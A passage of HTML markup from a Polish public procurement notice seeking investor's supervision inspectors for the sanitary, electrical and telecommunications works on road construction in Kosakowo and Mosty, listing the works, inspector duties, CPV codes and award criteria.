class="mb-0">71310000-4 - Doradcze usługi inżynieryjne i budowlane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji na wezwanie Zamawiającego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 – branża sanitarna<br/>a)	Przedmiotem zamówienia w części 2 jest usługa pełnienia funkcji Inspektora Nadzoru Inwestorskiego branży sanitarnej, nad realizacją inwestycji pn.: „Budowie ulic Złote Piaski i Aloesowej w Kosakowie oraz Leszczynowej, Liściastej i Ogrodowej w Mostach” – etap obejmujący ul. Złote Piaski w Kosakowie i ul. Ogrodową w Mostach” wraz z usługami dodatkowymi, zgodnie z przepisami a w szczególności zgodnie<br/> z zakresem czynności jaki dla nadzoru inwestorskiego przewiduje ustawa Prawo budowane z dnia 7 lipca 1994 r., dokumentacją projektową oraz bieżącymi ustaleniami <br/>z Zamawiającym. <br/>b)	Pełnienie funkcji inspektora nadzoru inwestorskiego w branży sanitarnej obejmuje następujący zakres robót budowlanych: <br/>-Kanalizacja deszczowa<br/>Budowa sieci kanalizacji deszczowej o następujących parametrach technicznych sieci i urządzeniach:<br/>•	Sieć kanalizacji deszczowej:<br/>-	Ø315: od D31a do D20,<br/>-	Ø500: od D19 do D20,<br/>-	Ø400: od D19-D38-D53 i D20-D32<br/>•	Przykanaliki deszczowe Ø200 mm – (47 szt.)<br/>-Wodociąg <br/>Przebudowa sieci wodociągowej w110 na 1 odcinku (W1 – W9) wraz z przepieciem 3 przyłączy oraz zmianą lokalizacji hydrantu Dn80. W węźle W9 włączenie wodociągu należy wykonać na trójnik DN 100/100 oraz zamontować zasuwę sieciową DN100.<br/>Przebudowa wodociągu obejmuje: <br/>budowę nowej sieci wodociągowej o łącznej długości 128,67 m, średnicy Ø 110, likwidację istniejącej sieci wodociągowej Ø 110 o długości 129,0 m,przepięcie 3 przyłączy,zmianę lokalizacji hydrantu Dn80.<br/>- Sieć kanalizacji sanitarnej Rozbudowa zaprojektowanej sieci kanalizacji sanitarnej poprzez włączenie doprojektowanej studni S56 (wg odrębnego opracowania) i budowę odcinka kanalizacji dn200 zakończonego zaślepieniem. Do przebudowy przeznaczono 1 odcinek kanalizacji grawitacyjnej Ø200 w ulicy Ogrodowej. Na istniejącym kolektorze należy wstawić studnię S9 i pod-łączyć ją do istniejącej studni Si po nowej trasie, poza jezdnią. <br/>Zaprojektowano przebudowę kanalizacji tłocznej Ø90 na 3 odcinkach. Prze-budowa będzie polegać na likwidacji istniejącego odcinka, który koliduje z drogą i budowę w nowej lokalizacji. <br/>Rozbudowa sieci kanalizacji sanitarnej obejmuje:<br/>a)	likwidację istniejącej sieci kanalizacji tłocznej Ø 90 o długości 253,5 m,<br/>b)	likwidację istniejącej sieci kanalizacji grawitacyjnej Ø 200 o długości 49,55 m.<br/>c) budowę sieci kanalizacji tłocznej ∅90 o długości 256,90 m: T1-T3 (66,75m), T4-T7 (157,35m) i T10-T11 (32,80m),<br/>d)	budowę sieci kanalizacji grawitacyjnej Ø200 o długości 50,65 m: odcinek S9-Si.<br/>6.	Usługa nadzoru inwestorskiego, w każdej z branż, obejmuje m.in.<br/>1)	Zapoznanie się z przekazaną przez Zamawiającego wszelką dokumentacją dotyczącą nadzorowanego zadania inwestycyjnego oraz niniejszego Przedmiotu zamówienia, w tym w szczególności dokumentacją projektową, dokumentacją przetargową na roboty budowlane (łącznie z pytaniami i odpowiedziami umieszczonymi w postępowaniu przetargowym), umową z Wykonawcą robót budowlanych, umową z Nadzorem Autorskim.<br/>2)	Udział w protokolarnym przekazaniu przez Zamawiającego dla Wykonawcy robót Placu Budowy, na zasadach i w sposób określony w umowie o roboty budowlane (zwanej dalej również Kontraktem);<br/>3)	Reprezentowanie Zamawiającego na budowie w zakresie zapewnienia codziennego nadzoru inwestorskiego; dostosowanie czasu pracy Inspektorów Nadzoru do czasu pracy Wykonawcy robót budowlanych i wymagań Zamawiającego;<br/>4)	Pełnienie nadzoru inwestorskiego w ramach zawartej Umowy;<br/>5)	Uczestnictwo w cotygodniowych naradach technicznych i co miesięcznych radach budowy z udziałem Inspektorów Nadzoru, Kierownika Budowy, przedstawicieli Podwykonawców robót oraz przedstawicieli Zamawiającego; <br/>6)	Sprawdzanie zgodności wykonywanych robót budowlanych z projektem i pozwoleniem na budowę, przepisami prawa i zasadami wiedzy technicznej; <br/>7)	Sprawdzanie i potwierdzanie jakości dostarczanych przez Wykonawcę robót: materiałów budowlanych, urządzeń, wyposażenia, i innych elementów robót wymaganych zapisami Kontraktu, w sposób i na zasadach w nim opisanych;<br/>8)	Sprawdzanie dokumentów, zezwoleń, deklaracji właściwości użytkowych, certyfikatów itd., w celu uniknięcia użycia materiałów niezgodnych z projektem, uszkodzonych lub niemających wymaganych certyfikatów;<br/>9)	Sprawdzanie i zaakceptowanie przedłożonych przez Wykonawcę robót (w formie pisemnej) harmonogramów rzeczowo-finansowych wraz z ich aktualizacjami;<br/>10)	Potwierdzanie i sprawdzanie stanu mobilizacji i zapewnienia sprzętu na Terenie Budowy jako odpowiedni lub nie dla wykonywanych robót budowlanych i jako zgodny lub nie z Kontraktem;<br/>11)	Nadzór nad obsługą geodezyjną Wykonawcy robót budowlanych;<br/>12)	Dokonywanie kontroli w czasie dostarczania materiałów i urządzeń, które będą niezbędne do realizacji robót,<br/>13)	Zapewnienie kontroli nad sposobem składowania i przechowywania materiałów;<br/>14)	Sprawdzanie jakości oraz zgodności materiałów budowlanych i instalacyjnych z Kontraktem, organizowanie dodatkowych testów jakości, jeśli będzie to konieczne, polegających na zleceniu dodatkowych testów jakości przez specjalistyczne instytuty, jeżeli jest to niezbędne, przy czym dodatkowe testy wykonywane będą na koszt Wykonawcy robót – w przypadku użycia przez Wykonawcę materiału niezgodnego z Kontraktem;<br/>15)	Sprawdzanie poprawności wykonania i odbieranie Robót ulegających zakryciu lub zanikających;<br/>16)	Uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych. Potwierdzanie faktycznie wykonanych robót budowlanych oraz usuniętych wad/usterek;<br/>17)	Wprowadzanie w trakcie realizacji robót (w porozumieniu z Nadzorem Autorskim), zaleceń Zamawiającego;<br/>18)	Bieżące dokonywanie z projektantami stosownych uzgodnień oraz egzekwowanie uzupełnień w ramach prowadzonego nadzoru autorskiego i uzgadnianie z nimi ewentualnych zmian, wprowadzonych przez Zamawiającego i /lub Wykonawcę robót;<br/>19)	Informowanie Zamawiającego o konieczności wykonania robót dodatkowych, uzupełniających i innych zgodnie z Kontraktem;<br/>20)	Przygotowywanie i przedkładanie Zamawiającemu kosztorysów dotyczących robót dodatkowych oraz uzupełniających i innych zgodnie z Kontraktem, a także opiniowanie ich zasadności oraz dokonywanie ich kontroli w trakcie realizacji;<br/>21)	Analizowanie i weryfikowanie zgodności z zapisami Kontraktu, dokumentów sporządzanych przez Wykonawcę robót i projektantów, na etapie realizacji Kontraktu, wraz z ich pisemną opinią;<br/>22)	Przygotowywanie i przedkładanie Zamawiającemu protokołów konieczności robót dodatkowych oraz uzupełniających i innych zgodnie z Kontraktem, wraz z kosztorysami dotyczącymi tych robót, a także opiniowanie ich zasadności, odpowiednio do nadzorowanego zakresu robót;<br/>23)	Wystawianie protokołów upoważniających Wykonawców robót do wystawiania faktur wraz z ustalaniem wartości wykonanych robót, na zasadach i w sposób określony w Kontrakcie;<br/>24)	Przeprowadzanie regularnych inspekcji Terenu Budowy sprawdzających w szczególności prawidłowość i jakość wykonywanych robót, przestrzeganie przepisów BiHP, jakość używanych materiałów, itp.;<br/>25)	Wydawanie Wykonawcy robót, Kierownikowi budowy lub Kierownikowi robót, poleceń dotyczących: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych, oraz przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych i dowodów dopuszczenia do stosowania w budownictwie wyrobów budowlanych, potwierdzonych wpisem do Dziennika Budowy;<br/>26)	Żądanie od Wykonawcy, Kierownika budowy lub Kierownika robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót budowlanych, a także wstrzymania ich dalszego wykonywania w przypadku, gdy ich kontynuacja mogłaby wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z projektem lub pozwoleniem na budowę;<br/>27)	Nadzór nad właściwym wywiązywaniem się z Kontraktu przez Wykonawcę robót; <br/>28)	Monitorowanie zgodności postępu rzeczowego i finansowego robót budowlanych z zatwierdzonym harmonogramem rzeczowo-finansowym;<br/>29)	Niezwłoczne sprawdzanie zestawień ilości i wartości wykonanych robót, będących podstawą do rozliczeń finansowych Zamawiającego z Wykonawcą robót budowlanych, odpowiednio do zakresu nadzorowanych robót;<br/>30)	Przeprowadzanie przy udziale Zamawiającego odbiorów częściowych oraz odbioru końcowego w sposób i zgodnie z zapisami Kontraktu; <br/>31)	Nadzorowanie i dopilnowanie zaleceń komisji odbiorowej dotyczących usunięcia przez Wykonawcę robót stwierdzonych usterek dających się naprawić; <br/>32)	Opracowanie opinii dotyczącej wad obiektu uznanych za nie nadające się do usunięcia oraz wnioskowanie o obniżenie wynagrodzenia Wykonawcy robót z określeniem utraty wartości robót budowlanych i kwot obniżonego wynagrodzenia za te roboty;<br/>33)	Opiniowanie proponowanych metod wykonania robót budowlanych zaproponowanych przez Wykonawcę robót;<br/>34)	Uzgadnianie z Zamawiającym wszelkich propozycji zmian dotyczących zakresu, technologii i wartości robót budowlanych;<br/>35)	Sprawdzanie rozwiązań zamiennych i wnioskowanie do Zamawiającego o ich zastosowanie;<br/>36)	Zatwierdzanie rysunków wykonawczych i warsztatowych sporządzonych przez Wykonawcę robót budowlanych;<br/>37)	Informowanie Zamawiającego z odpowiednim wyprzedzeniem o wszelkich zagrożeniach występujących podczas realizacji robót oraz podejmowanych działaniach zapobiegawczych i naprawczych;<br/>38) Sprawdzenie poprawności opracowania dokumentacji powykonawczej oraz ocena jej zgodności z faktycznie wykonanymi robotami budowlanymi, w sposób i na warunkach określonych w Kontrakcie;<br/>39) Przygotowanie, w przypadku przerwania robót budowlanych przez Wykonawcę robót, inwentaryzacji wykonanych robót wykonanych do dnia ich przerwania;<br/>40) W przypadku przerwania Kontraktu, wykonywanie wszelkich czynności związanych z tym przerwaniem, w tym co najmniej nadzór nad przejęciem placu budowy, nad robotami zabezpieczającymi itp. Pozostały zakres obowiązków zawarto w Rozdziale IV pkt 6 SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71520000-9 - Usługi nadzoru budowlanego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71247000-1 - Nadzór nad robotami budowlanymi</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71700000-5 - Usługi nadzoru i kontroli</p> <p class="mb-0">71310000-4 - Doradcze usługi inżynieryjne i budowlane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji na wezwanie Zamawiającego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3)	Część 3 – branża elektryczna<br/>a)	Przedmiotem zamówienia w części 3 jest usługa pełnienia funkcji Inspektora Nadzoru Inwestorskiego branży elektrycznej, nad realizacją inwestycji pn.: „Budowie ulic Złote Piaski i Aloesowej w Kosakowie oraz Leszczynowej, Liściastej i Ogrodowej w Mostach” – etap obejmujący ul. Złote Piaski w Kosakowie i ul. Ogrodową w Mostach” wraz z usługami dodatkowymi, zgodnie z przepisami a w szczególności zgodnie <br/>z zakresem czynności jaki dla nadzoru inwestorskiego przewiduje ustawa Prawo budowane z dnia 7 lipca 1994 r., dokumentacją projektową oraz bieżącymi ustaleniami z Zamawiającym. <br/>b)	Pełnienie funkcji inspektora nadzoru inwestorskiego w branży elektrycznej obejmuje następujący zakres robót budowlanych: <br/>a)	Oświetlenie uliczne. <br/>-Zakres budowy oświetlenia obejmuje: budowę oświetlenia projektowanego układu drogowego; <br/>-budowę doświetlenia przejść dla pieszych; <br/>-budowę szafki oświetleniowej; <br/>-demontaż słupów oświetleniowych;<br/>-demontaż linii kablowej. <br/>Istniejące słupy oświetleniowe L1-2, L1-3, L1-2.1 (ul. Złote Piaski) i L2-1.2 (ul. Lubczykowa) należy wymienić na nowe. Słup L2-2 (ul. Złote Piaski) należy zdemontować. Linię kablową YAKY 4x25 relacji sł. L2-1.2 – sł. L2-1.4 wraz ze słupami L2-1.3 oraz L2-1 znajdujących się na ul. Złote Piaski należy zdemontować. Oświetlenie zasilane jest z SO-Szafranowa. Ponadto należy zdemontować istniejący słup 7/1/3 znajdujący się przy skrzyżowaniu ulic Ogrodowej i Jodłowej. Oświetlenie zasilane jest z SO-Polna. Demontaż linii kablowej YAKY4x25 oraz istniejących słupów oświetleniowych L2-1.4 i L2-1.3.<br/>Demontaż oraz wymianę słupów wykonać zgodnie z projektem zagospodarowania terenu rys. 1.1 i 1.2 oraz ze schematami rys. 2.1 i 2.2. W miejscach wskazanych na rysunkach wykonać połączenia kabli za pomocą muf.<br/>b)	Usunięcie kolizji sieci energetycznej<br/>Przebudowa elektroenergetycznej linii kablowych SN-15kV oraz linii napo-wietrznej nn-0,4kV.<br/>c)	Linia SN (kablowa)<br/>Dla zrealizowania zadania wynikającego z Warunków Przebudowy nr R/20/032791 należy: <br/>- przebudować istniejącą linię kablową SN-15kV nr 5689, relacji T-2407 „Złote Piaski I” – T-4098 „Złote Piaski II”, zgodnie z rys. E-1.1 i E-1.2. Nową trasę wykonać kablem typu 3xNA2XS(FL)2Y 1x150/25 12/20kV i połączyć go z istniejącym kablem za pomocą muf przelotowych typu CSJA-24/1x35-150, <br/>-przebudować istniejącą linię kablową SN-15kV nr 5675, relacji T-2447 „Mosty Ogrodowa” – T-4098 „Złote Piaski II”, zgodnie z rys. E-1.1 i E-1.2. Nową trasę wykonać kablem typu 3xNA2XS(FL)2Y 1x150/25 12/20kV i połączyć go z istniejącym kablem za pomocą muf przelotowych typu CSJA-24/1x35-150.<br/>d)	Linia nn (napowietrzna/kablowa)<br/>Dla zrealizowania zadania wynikającego z Warunków Przebudowy nr R/20/040960 należy: <br/>-przebudować poprzez skablowanie istniejącą linię napowietrzną nn-0,4kV relacji sł.1 – sł.4 zasilanej z T-2447 „Mosty Ogrodowa” wraz z przyłączami (rozbiórka pkt. 12), zgodnie z trasą pokazaną na rys.E-1.2. Nową trasę wykonać kablem typu YAKXS 4x120, wprowadzić do inst. złączy kablowych i połączyć go z istniejącym kablem za pomocą mufy przelotowej typu SMHSV4 50-120.<br/>6.	Usługa nadzoru inwestorskiego, w każdej z branż, obejmuje m.in.<br/>1)	Zapoznanie się z przekazaną przez Zamawiającego wszelką dokumentacją dotyczącą nadzorowanego zadania inwestycyjnego oraz niniejszego Przedmiotu zamówienia, w tym w szczególności dokumentacją projektową, dokumentacją przetargową na roboty budowlane (łącznie z pytaniami i odpowiedziami umieszczonymi w postępowaniu przetargowym), umową z Wykonawcą robót budowlanych, umową z Nadzorem Autorskim.<br/>2)	Udział w protokolarnym przekazaniu przez Zamawiającego dla Wykonawcy robót Placu Budowy, na zasadach i w sposób określony w umowie o roboty budowlane (zwanej dalej również Kontraktem);<br/>3)	Reprezentowanie Zamawiającego na budowie w zakresie zapewnienia codziennego nadzoru inwestorskiego; dostosowanie czasu pracy Inspektorów Nadzoru do czasu pracy Wykonawcy robót budowlanych i wymagań Zamawiającego;<br/>4)	Pełnienie nadzoru inwestorskiego w ramach zawartej Umowy;<br/>5)	Uczestnictwo w cotygodniowych naradach technicznych i co miesięcznych radach budowy z udziałem Inspektorów Nadzoru, Kierownika Budowy, przedstawicieli Podwykonawców robót oraz przedstawicieli Zamawiającego; <br/>6)	Sprawdzanie zgodności wykonywanych robót budowlanych z projektem i pozwoleniem na budowę, przepisami prawa i zasadami wiedzy technicznej; <br/>7)	Sprawdzanie i potwierdzanie jakości dostarczanych przez Wykonawcę robót: materiałów budowlanych, urządzeń, wyposażenia, i innych elementów robót wymaganych zapisami Kontraktu, w sposób i na zasadach w nim opisanych;<br/>8)	Sprawdzanie dokumentów, zezwoleń, deklaracji właściwości użytkowych, certyfikatów itd., w celu uniknięcia użycia materiałów niezgodnych z projektem, uszkodzonych lub niemających wymaganych certyfikatów;<br/>9)	Sprawdzanie i zaakceptowanie przedłożonych przez Wykonawcę robót (w formie pisemnej) harmonogramów rzeczowo-finansowych wraz z ich aktualizacjami;<br/>10) Potwierdzanie i sprawdzanie stanu mobilizacji i zapewnienia sprzętu na Terenie Budowy jako odpowiedni lub nie dla wykonywanych robót budowlanych i jako zgodny lub nie z Kontraktem;<br/>11) Nadzór nad obsługą geodezyjną Wykonawcy robót budowlanych;<br/>12) Dokonywanie kontroli w czasie dostarczania materiałów i urządzeń, które będą niezbędne do realizacji robót,<br/>13) Zapewnienie kontroli nad sposobem składowania i przechowywania materiałów;<br/>14) Sprawdzanie jakości oraz zgodności materiałów budowlanych i instalacyjnych z Kontraktem, organizowanie dodatkowych testów jakości, jeśli będzie to konieczne, polegających na zleceniu dodatkowych testów jakości przez specjalistyczne instytuty, jeżeli jest to niezbędne, przy czym dodatkowe testy wykonywane będą na koszt Wykonawcy robót – w przypadku użycia przez Wykonawcę materiału niezgodnego z Kontraktem;<br/>15)	Sprawdzanie poprawności wykonania i odbieranie Robót ulegających zakryciu lub zanikających;<br/>16)	Uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych. Potwierdzanie faktycznie wykonanych robót budowlanych oraz usuniętych wad/usterek;<br/>17)	Wprowadzanie w trakcie realizacji robót (w porozumieniu z Nadzorem Autorskim), zaleceń Zamawiającego;<br/>18)	Bieżące dokonywanie z projektantami stosownych uzgodnień oraz egzekwowanie uzupełnień w ramach prowadzonego nadzoru autorskiego i uzgadnianie z nimi ewentualnych zmian, wprowadzonych przez Zamawiającego i /lub Wykonawcę robót;<br/>19)	Informowanie Zamawiającego o konieczności wykonania robót dodatkowych, uzupełniających i innych zgodnie z Kontraktem;<br/>20)	Przygotowywanie i przedkładanie Zamawiającemu kosztorysów dotyczących robót dodatkowych oraz uzupełniających i innych zgodnie z Kontraktem, a także opiniowanie ich zasadności oraz dokonywanie ich kontroli w trakcie realizacji;<br/>21)	Analizowanie i weryfikowanie zgodności z zapisami Kontraktu, dokumentów sporządzanych przez Wykonawcę robót i projektantów, na etapie realizacji Kontraktu, wraz z ich pisemną opinią;<br/>22)	Przygotowywanie i przedkładanie Zamawiającemu protokołów konieczności robót dodatkowych oraz uzupełniających i innych zgodnie z Kontraktem, wraz z kosztorysami dotyczącymi tych robót, a także opiniowanie ich zasadności, odpowiednio do nadzorowanego zakresu robót;<br/>23)	Wystawianie protokołów upoważniających Wykonawców robót do wystawiania faktur wraz z ustalaniem wartości wykonanych robót, na zasadach i w sposób określony w Kontrakcie;<br/>24)	Przeprowadzanie regularnych inspekcji Terenu Budowy sprawdzających w szczególności prawidłowość i jakość wykonywanych robót, przestrzeganie przepisów BiHP, jakość używanych materiałów, itp.;<br/>25)	Wydawanie Wykonawcy robót, Kierownikowi budowy lub Kierownikowi robót, poleceń dotyczących: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych, oraz przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych i dowodów dopuszczenia do stosowania w budownictwie wyrobów budowlanych, potwierdzonych wpisem do Dziennika Budowy;<br/>26)	Żądanie od Wykonawcy, Kierownika budowy lub Kierownika robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót budowlanych, a także wstrzymania ich dalszego wykonywania w przypadku, gdy ich kontynuacja mogłaby wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z projektem lub pozwoleniem na budowę;<br/>27)	Nadzór nad właściwym wywiązywaniem się z Kontraktu przez Wykonawcę robót; <br/>28)	Monitorowanie zgodności postępu rzeczowego i finansowego robót budowlanych z zatwierdzonym harmonogramem rzeczowo-finansowym;<br/>29)	Niezwłoczne sprawdzanie zestawień ilości i wartości wykonanych robót, będących podstawą do rozliczeń finansowych Zamawiającego z Wykonawcą robót budowlanych, odpowiednio do zakresu nadzorowanych robót;<br/>30) Przeprowadzanie przy udziale Zamawiającego odbiorów częściowych oraz odbioru końcowego w sposób i zgodnie z zapisami Kontraktu; <br/>31) Nadzorowanie i dopilnowanie zaleceń komisji odbiorowej dotyczących usunięcia przez Wykonawcę robót stwierdzonych usterek dających się naprawić; <br/>32) Opracowanie opinii dotyczącej wad obiektu uznanych za nie nadające się do usunięcia oraz wnioskowanie o obniżenie wynagrodzenia Wykonawcy robót z określeniem utraty wartości robót budowlanych i kwot obniżonego wynagrodzenia za te roboty;<br/>33) Opiniowanie proponowanych metod wykonania robót budowlanych zaproponowanych przez Wykonawcę robót;<br/>34) Uzgadnianie z Zamawiającym wszelkich propozycji zmian dotyczących zakresu, technologii i wartości robót budowlanych;<br/>35) Sprawdzanie rozwiązań zamiennych i wnioskowanie do Zamawiającego o ich zastosowanie;<br/>36) Zatwierdzanie rysunków wykonawczych i warsztatowych sporządzonych przez Wykonawcę robót budowlanych;<br/>37) Informowanie Zamawiającego z odpowiednim wyprzedzeniem o wszelkich zagrożeniach występujących podczas realizacji robót oraz podejmowanych działaniach zapobiegawczych i naprawczych. Pozostały zakres obowiązków zawarto w Rozdziale IV pkt 6 SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71520000-9 - Usługi nadzoru budowlanego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71247000-1 - Nadzór nad robotami budowlanymi</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71700000-5 - Usługi nadzoru i kontroli</p> <p class="mb-0">71310000-4 - Doradcze usługi inżynieryjne i budowlane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji na wezwanie Zamawiającego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4 – branża teletechniczna<br/>a)	Przedmiotem zamówienia w części 4 jest usługa pełnienia funkcji Inspektora Nadzoru Inwestorskiego branży teletechnicznej nad realizacją inwestycji pn.: „Budowie ulic Złote Piaski i Aloesowej w Kosakowie oraz Leszczynowej, Liściastej i Ogrodowej w Mostach” – etap obejmujący ul. Złote Piaski w Kosakowie i ul. Ogrodową w Mostach” wraz z usługami dodatkowymi, zgodnie z przepisami a w szczególności zgodnie z zakresem czynności jaki dla nadzoru inwestorskiego przewiduje ustawa Prawo budowane z dnia 7 lipca 1994 r., dokumentacją projektową oraz bieżącymi ustaleniami <br/>z Zamawiającym. <br/>b)	Pełnienie funkcji inspektora nadzoru inwestorskiego w branży teletechnicznej obejmuje następujący zakres robót budowlanych: <br/>-Kanał technologiczny Zakres budowy kanału technologicznego obejmuje: budowę studni kablowej typ SKR-1 - 31 szt. budowę kanału techno-logicznego ulicznego KTu – 661,0 m, budowę kanału technologicznego przepustowego KTp - 254,0 m.<br/>-Usunięcie kolizji z sieciami telekomunikacyjnymi Orange S.A.<br/>W zakresie usunięcia kolizji z infrastrukturą telekomunikacyjną operatora Orange S.A. należy:<br/>-	Wykonać przepusty kablowe z rur HDPE fi 110/6,3 – 36 m.<br/>-	Zabezpieczyć istniejącą sieć teletechniczną rurami dwudzielnymi Ø 110 Ułożyć do ziemi kabel XzTKMXpw 25x4x0,5 – 165 m. <br/>-	Wykonać bezprzerwowe przełączenie sieci poprzez wykonanie złączy równoległych. <br/>-	Wyłączyć likwidowane kable ze złączy równoległych.<br/>-	Zlikwidować kolidującą sieć. Przełożyć kable z miejscach wskazanych w projekcie – 12m.Całość prac wykonać po uzyskaniu zgody i pod nadzorem gestora sieci.<br/>-Usunięcie kolizji sieci teletechnicznej Marynarki Wojennej RCIW ce-lu usunięcia kolizji sieci teletechnicznej Marynarki Wojennej RCI nale-ży:<br/>-	Wybudować studnie kablowe SKR-2 w miejscach wskazanych w projekcie – 5 szt. Wybudować odcinki kanalizacji teletech-nicznej 1 otworowej z rur HDPE fi110/6,3 zgodnie z projektem – 32m. <br/>-	Zaciągnąć do kanalizacji teletechnicznej kable XzTKMXpw 15x4x0,6 zgodnie ze schematem – 60m. <br/>-	Wykonać przełączenie sieci teletechnicznej poprzez wykona-nie złączy równoległych.<br/>6.	Usługa nadzoru inwestorskiego, w każdej z branż, obejmuje m.in.<br/>1)	Zapoznanie się z przekazaną przez Zamawiającego wszelką dokumentacją dotyczącą nadzorowanego zadania inwestycyjnego oraz niniejszego Przedmiotu zamówienia, w tym w szczególności dokumentacją projektową, dokumentacją przetargową na roboty budowlane (łącznie z pytaniami i odpowiedziami umieszczonymi w postępowaniu przetargowym), umową z Wykonawcą robót budowlanych, umową z Nadzorem Autorskim.<br/>2)	Udział w protokolarnym przekazaniu przez Zamawiającego dla Wykonawcy robót Placu Budowy, na zasadach i w sposób określony w umowie o roboty budowlane (zwanej dalej również Kontraktem);<br/>3)	Reprezentowanie Zamawiającego na budowie w zakresie zapewnienia codziennego nadzoru inwestorskiego; dostosowanie czasu pracy Inspektorów Nadzoru do czasu pracy Wykonawcy robót budowlanych i wymagań Zamawiającego;<br/>4)	